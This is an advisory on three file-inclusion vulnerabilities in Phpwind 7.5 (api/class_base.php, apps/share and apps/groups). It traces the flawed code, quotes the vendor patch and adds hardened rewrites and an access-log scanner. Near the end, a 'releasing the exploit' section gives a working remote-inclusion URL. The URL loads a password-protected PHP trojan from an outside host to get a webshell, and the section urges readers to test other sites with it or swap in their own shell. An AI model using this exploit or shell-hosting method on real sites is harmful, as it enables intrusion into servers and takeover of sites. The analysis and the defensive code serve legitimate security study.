Phpwind 7.5 Multiple Include Vulnerabilities
I. Local file inclusion vulnerability in api/class_base.php
1. Description
The $mode variable in the callback() function of api/class_base.php is not filtered, which allows arbitrary local files to be included and therefore arbitrary PHP code to be executed.
2. Detailed Analysis
In the api/class_base.php file:
function callback($mode, $method, $params) {
    if (!isset($this->classdb[$mode])) {
        if (!file_exists(R_P.'api/class_'.$mode.'.php')) {
            return new ErrorMsg(API_MODE_NOT_EXISTS, "Class ($mode) Not Exists");
        }
        require_once(R_P.'api/class_'.$mode.'.php'); // here
        $this->classdb[$mode] = new $mode($this);
    }
    if (!method_exists($this->classdb[$mode], $method)) {
        return new ErrorMsg(API_METHOD_NOT_EXISTS, "Method ($method of $mode) Not Exists");
    }
    !is_array($params) && $params = array();
    return @call_user_func_array(array(&$this->classdb[$mode], $method), $params);
}
Let's follow how the variables get there. The function above is called from run():
function run($request) {
    $request = $this->strips($request);
    if (isset($request['type']) && $request['type'] == 'uc') {
        $this->type   = 'uc';
        $this->apikey = $GLOBALS['uc_key']; // note: this variable is also the key to this vulnerability
    } else {
        $this->type       = 'app';
        $this->apikey     = $GLOBALS['db_siteownerid'];
        $this->siteappkey = $GLOBALS['db_siteappkey'];
    }
    /***
    if ($this->type == 'app' && !$GLOBALS['o_appifopen']) {
        return new ErrorMsg(API_CLOSED, 'App Closed');
    }
    ***/
    ksort($request);
    reset($request);
    $arg = '';
    foreach ($request as $key => $value) {
        if ($value && $key != 'sig') {
            $arg .= "$key=$value&";
        }
    }
    if (md5($arg.$this->apikey) != $request['sig']) { // pay attention to this check and how it is bypassed: as shown above,
                                                      // $this->apikey = $GLOBALS['uc_key'], and $request['sig'] is under our
                                                      // control, so it is easy to bypass
        return new ErrorMsg(API_SIGN_ERROR, 'Error Sign');
    }
    $mode   = $request['mode']; // $mode is taken without any filtering and goes straight into callback() below
    $method = $request['method'];
    $params = isset($request['params']) ? unserialize($request['params']) : array();
    if (isset($params['appthreads'])) {
        if (PHP_VERSION < 5.2) {
            require_once(R_P.'api/class_json.php');
            $json = new Services_JSON(true);
            $params['appthreads'] = $json->decode(@gzuncompress($params['appthreads']));
        } else {
            $params['appthreads'] = json_decode(@gzuncompress($params['appthreads']), true);
        }
    }
    if ($params && isset($request['charset'])) {
        $params = pwConvert($params, $this->charset, $request['charset']);
    }
    return $this->callback($mode, $method, $params); // call callback()
}
Now look at where run() is called, in pw_api.php:
$api = new api_client();
$response = $api->run($_POST + $_GET); // run() is fed the variables submitted via $_POST and $_GET directly
The analysis above traces the vulnerable variable backwards through the entire submission path. This vulnerability also involves an encoding/decoding question: to include arbitrary files through require_once(R_P.'api/class_'.$mode.'.php'), magic quotes have to be bypassed. See the first line of run():
$request = $this->strips($request);
The code of strips():
function strips($param) {
    if (is_array($param)) {
        foreach ($param as $key => $value) {
            $param[$key] = $this->strips($value);
        }
    } else {
        $param = stripslashes($param); // stripslashes() is applied to the variable directly, so magic quotes are bypassed :)
    }
    return $param;
}
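The two weaknesses the analysis above points at inside run() are a signature check that the caller can satisfy and a $mode value that reaches require_once() unfiltered. The following is an added example of a hardened front end for callback(), not Phpwind's code: the helper names canonical_query(), sign_request(), verify_signature() and safe_api_request(), the allow-list $allowed_modes, and the policy of refusing every request when the API key is empty are all assumptions made for this example.

```php
<?php
// Added example (not Phpwind code): a hardened front end for callback().
// Assumed names: canonical_query(), sign_request(), verify_signature(), safe_api_request(),
// and the allow-list $allowed_modes. Assumed policy: an empty API key refuses every request.

function canonical_query(array $request) {
    // Same canonical form as run(): keys sorted, "key=value&" pairs, 'sig' itself excluded.
    ksort($request);
    $arg = '';
    foreach ($request as $key => $value) {
        if ($value && $key != 'sig') {
            $arg .= "$key=$value&";
        }
    }
    return $arg;
}

function sign_request(array $request, $apikey) {
    $request['sig'] = md5(canonical_query($request) . $apikey);
    return $request;
}

function verify_signature(array $request, $apikey) {
    // With no key configured, md5($arg . '') is computable by anyone, so refuse outright.
    if (!is_string($apikey) || $apikey === '') {
        return false;
    }
    if (!isset($request['sig']) || !is_string($request['sig'])) {
        return false;
    }
    $expected = md5(canonical_query($request) . $apikey);
    if (function_exists('hash_equals')) {          // PHP >= 5.6
        return hash_equals($expected, $request['sig']);
    }
    if (strlen($expected) !== strlen($request['sig'])) {
        return false;
    }
    $diff = 0;                                     // constant-time fallback for older PHP
    for ($i = 0, $n = strlen($expected); $i < $n; $i++) {
        $diff |= ord($expected[$i]) ^ ord($request['sig'][$i]);
    }
    return $diff === 0;
}

// Only these API classes may be loaded; the list is a constructed stand-in for api/class_*.php.
$allowed_modes = array('user', 'thread');

function safe_api_request(array $request, $apikey, array $allowed_modes) {
    if (!verify_signature($request, $apikey)) {
        return array('error' => 'Error Sign');
    }
    $mode   = isset($request['mode'])   ? $request['mode']   : '';
    $method = isset($request['method']) ? $request['method'] : '';
    // Identifier-only names: no '/', '..', NUL bytes or stream wrappers can reach require_once().
    if (!preg_match('/^[A-Za-z0-9_]{1,32}$/', $mode) || !in_array($mode, $allowed_modes, true)) {
        return array('error' => 'Class Not Exists');
    }
    if (!preg_match('/^[A-Za-z_][A-Za-z0-9_]{0,63}$/', $method)) {
        return array('error' => 'Method Not Exists');
    }
    return array('mode' => $mode, 'method' => $method);   // safe to hand to callback()
}

// Constructed requests, run offline.
$key   = 'constructed-uc-key';
$cases = array(
    'valid'      => sign_request(array('type' => 'uc', 'mode' => 'user', 'method' => 'get'), $key),
    'bad mode'   => sign_request(array('type' => 'uc', 'mode' => '../../other', 'method' => 'get'), $key),
    'forged sig' => array('type' => 'uc', 'mode' => 'user', 'method' => 'get', 'sig' => str_repeat('0', 32)),
);
foreach ($cases as $label => $request) {
    echo str_pad($label, 12), ': ', json_encode(safe_api_request($request, $key, $allowed_modes)), "\n";
}
// A correctly signed request is still refused when the server side has no key at all.
echo str_pad('empty key', 12), ': ', json_encode(safe_api_request($cases['valid'], '', $allowed_modes)), "\n";
```

The design point is that the signature only proves knowledge of the key, so an empty or guessable key makes the check worthless; the name check is therefore kept independent of it, and only the exact strings in $allowed_modes are ever concatenated into the include path.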
3. POC/EXP
Omitted.
4. FIX
Because the vulnerability details leaked, the vendor has already released a fix:
http://www.phpwind.net/read-htm-tid-914851.html
Patched code:
require_once Pcv(R_P.'api/class_'.$mode.'.php');

function Pcv($filename, $ifcheck = 1) {
    $tmpname  = strtolower($filename);
    $tmparray = array('http://', "\0"); // http:// blocks remote inclusion, the NUL byte blocks truncation
                                         // (the escaped NUL was lost in extraction and is restored here)
    $ifcheck && $tmparray[] = '..';      // '..' is filtered too, so directory traversal is blocked
    if (str_replace($tmparray, '', $tmpname) != $tmpname) {
        exit('Forbidden');
    }
    return $filename;
}
Pcv() shows how clumsy Phpwind's patching style is. This one function alone still has several logic problems: filtering http:// is laughable, since it does nothing about ftp://, for instance...
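The author's objection to Pcv() is that a deny-list of bad substrings (http://, the NUL byte, '..') raises the question of which strings were forgotten. An allow-list check does not have that problem: the name must look like an identifier, and the resolved path must lie inside the API directory. The following is an added example and not Phpwind's patch; the helper name safe_api_include_path() and the constructed temporary api/ directory it is demonstrated against are assumptions.

```php
<?php
// Added example (not Phpwind's patch): an allow-list replacement for Pcv().
// Assumed helper name safe_api_include_path(); the api/ directory is passed in explicitly.

function safe_api_include_path($api_dir, $mode) {
    // 1. Shape: an API class name is a plain identifier. Anything else (a scheme such as
    //    ftp://, '..', a NUL byte) fails here without having to be listed individually.
    if (!is_string($mode) || !preg_match('/^[A-Za-z0-9_]{1,32}$/', $mode)) {
        return false;
    }
    // 2. Containment: resolve symlinks and '.'/'..' and require the result to be below $api_dir.
    $base = realpath($api_dir);
    $path = realpath($api_dir . '/class_' . $mode . '.php');
    if ($base === false || $path === false) {
        return false;                           // directory or file does not exist
    }
    if (strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return false;                           // resolved outside the API directory
    }
    return $path;
}

// Offline demonstration against a constructed api/ directory in the temp folder.
$api_dir = sys_get_temp_dir() . '/pw_api_demo_' . getmypid();
mkdir($api_dir);
file_put_contents($api_dir . '/class_user.php', "<?php class user {}\n");

$probes = array(
    'user',             // the only legitimate name: resolves to a path under $api_dir
    'thread',           // well-formed but no such file: rejected
    '../class_user',    // traversal attempt: fails the identifier check
    'ftp://host/x',     // the case the author raises about Pcv(): fails the identifier check
    "user\0",           // NUL-byte truncation attempt: fails the identifier check
);
foreach ($probes as $mode) {
    $result = safe_api_include_path($api_dir, $mode);
    printf("%-16s => %s\n", addcslashes($mode, "\0"), $result === false ? 'rejected' : $result);
}

unlink($api_dir . '/class_user.php');
rmdir($api_dir);
```

In callback() the call site becomes: obtain $path from safe_api_include_path(), return the API_MODE_NOT_EXISTS error when it is false, and only otherwise require_once $path. Step 2 is defence in depth behind step 1; it is what still protects the include if the identifier check is ever loosened or a symlink is dropped into api/.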
II. Remote inclusion vulnerability in apps/share/index.php
1. Description
The $route and $basePath variables in apps/share/index.php are never initialized, which allows remote or local inclusion of PHP files and therefore arbitrary PHP code execution.
2. Detailed Analysis
<?php
if ($route == "share") {
    require_once $basePath.'/action/m_share.php';
} elseif ($route == "sharelink") {
    require_once $basePath.'/action/m_sharelink.php';
}
?>
This vulnerability hardly needs any analysis!!!! I suggest whoever wrote this code should have their year-end bonus docked...
3. POC/EXP
Omitted.
4. FIX
Wait for the official patch; if you do not need this module, simply delete the file.
III. Remote inclusion vulnerability in apps/groups/index.php
1. Description
The $route and $basePath variables in apps/groups/index.php are never initialized, which allows remote or local inclusion of PHP files and therefore arbitrary PHP code execution.
2. Detailed Analysis
<?php
if ($route == "groups") {
    require_once $basePath.'/action/m_groups.php';
} elseif ($route == "group") {
    require_once $basePath.'/action/m_group.php';
} elseif ($route == "galbum") {
    require_once $basePath.'/action/m_galbum.php';
}
This vulnerability hardly needs any analysis!!!! I suggest whoever wrote this code should have their year-end bonus docked...
3. POC/EXP
Omitted.
4. FIX
Wait for the official patch; if you do not need this module, simply delete the file.
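apps/share/index.php (section II) and apps/groups/index.php (section III) have the same shape, so one corrected version serves both. This is an added example, not the official patch: it assumes that $route is meant to arrive as a GET parameter (as the request URLs in this advisory show) and that $basePath is meant to be the directory the file itself lives in. The share version is identical apart from its two route names.

```php
<?php
// Added example (not the official patch): apps/groups/index.php with both variables initialised.
// Assumed: $route arrives as a GET parameter; $basePath is this file's own directory.

// Fixed to the directory of this file, never a value from the request (register_globals or otherwise).
$basePath = dirname(__FILE__);

// The request selects a key of this table; the file name itself is never built from request data.
$routes = array(
    'groups' => 'm_groups.php',
    'group'  => 'm_group.php',
    'galbum' => 'm_galbum.php',
);

// Explicit default instead of a variable that may or may not have been set.
$route = isset($_GET['route']) ? $_GET['route'] : 'groups';

// is_string() rejects route[]=... arrays; the isset() lookup rejects every unknown value,
// so a route of '../x' or a URL simply selects nothing.
if (!is_string($route) || !isset($routes[$route])) {
    header('HTTP/1.0 404 Not Found');
    exit('Unknown route');
}

require_once $basePath . '/action/' . $routes[$route];
```

A basePath query parameter is ignored because nothing reads it any more; that is the whole fix for the remote-inclusion half, and the route table is the fix for the local half.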
Latest news: the vendor has released a patch: http://www.phpwind.net/read-htm-tid-914851.html
Releasing the exploit:
http://www.######.***/apps/groups/index.php?route=groups&basePath=http://www.hackqing.cn/qing.txt?
Open it in a browser:
http://www.######.***/apps/groups/index.php?route=groups&basePath=http://www.hackqing.cn/qing.txt? (password qing520)
After the request, the file is included and you get a webshell (keep the trailing question mark, otherwise it fails).
To test whether another site is vulnerable, append apps/groups/index.php?route=groups&basePath=http://www.hackqing.cn/qing.txt? to its URL and open it. If a shell comes back, the vulnerability exists and was exploited successfully; if not, the site has been patched.
http://www.hackqing.cn/qing.txt? can be replaced with your own shell, which is more convenient.
qing.txt holds the PHP trojan.
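For operators who cannot patch or remove the files immediately, the request shapes described in this advisory are easy to spot in web server access logs: a basePath parameter that carries a URL or '..', or a pw_api.php call whose mode contains path characters. The following scanner is an added example and not part of the advisory; the rule names and the scan_access_log() helper are assumptions, and the log lines are constructed, with placeholder hosts and addresses.

```php
<?php
// Added example (not from the advisory): flag access-log lines matching the request shapes above.
// Rule names and scan_access_log() are assumed; the sample log is constructed.

$rules = array(
    'remote_include_basePath' => '#/apps/(share|groups)/index\.php\?[^ ]*basePath=[^ &]*(?:%3a|:)//#i',
    'traversal_basePath'      => '#/apps/(share|groups)/index\.php\?[^ ]*basePath=[^ &]*(?:\.\.|%2e%2e)#i',
    'api_mode_path'           => '#/pw_api\.php\?[^ ]*mode=[^ &]*(?:/|%2f|\.\.|%00|:)#i',
);

// Returns one hit per matching line: its 1-based line number and the first rule that matched.
function scan_access_log(array $lines, array $rules) {
    $hits = array();
    foreach ($lines as $no => $line) {
        foreach ($rules as $name => $re) {
            if (preg_match($re, $line)) {
                $hits[] = array('line' => $no + 1, 'rule' => $name);
                break;
            }
        }
    }
    return $hits;
}

// Constructed sample in combined log format; hosts and addresses are placeholders.
$sample = array(
    '203.0.113.5 - - [10/Oct/2010:12:00:01 +0800] "GET /apps/groups/index.php?route=groups HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Oct/2010:12:00:02 +0800] "GET /apps/groups/index.php?route=groups&basePath=http://attacker.example/x.txt? HTTP/1.1" 200 1024',
    '203.0.113.6 - - [10/Oct/2010:12:00:03 +0800] "GET /apps/share/index.php?route=share&basePath=../../../../tmp HTTP/1.1" 500 0',
    '203.0.113.7 - - [10/Oct/2010:12:00:04 +0800] "POST /pw_api.php HTTP/1.1" 200 80',
    '203.0.113.7 - - [10/Oct/2010:12:00:05 +0800] "GET /pw_api.php?type=uc&mode=../../placeholder&method=x&sig=0 HTTP/1.1" 200 80',
);

foreach (scan_access_log($sample, $rules) as $hit) {
    printf("line %d: %s\n", $hit['line'], $hit['rule']);
}
```

Lines 2, 3 and 5 of the sample are flagged and lines 1 and 4 are not. The unflagged POST on line 4 is the caveat: pw_api.php takes $_POST + $_GET, and request bodies are not in a standard access log, so this scan only sees the GET form of the class_base.php issue; catching the POST form needs body logging or a web application firewall in front of the script.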
Author: Love Blog